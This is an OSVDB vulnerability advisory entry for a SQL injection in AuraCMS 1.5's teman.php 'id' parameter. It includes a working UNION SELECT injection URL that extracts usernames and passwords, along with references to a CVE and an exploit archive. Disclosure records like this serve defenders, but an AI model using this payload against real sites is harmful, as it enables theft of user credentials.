AuraCMS teman.php id Variable SQL Injection

2007-09-09T00:00:00
ID OSVDB:38413
Type osvdb
Reporter OSVDB
Modified 2007-09-09T00:00:00

Description

Manual Testing Notes

http://[target]/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/*

References:

Related OSVDB ID: 38411
Related OSVDB ID: 38409
Related OSVDB ID: 38410
Related OSVDB ID: 38412
ISS X-Force ID: 36519
Generic Exploit URL: http://www.milw0rm.com/exploits/4385
CVE-2007-4804
Bugtraq ID: 25614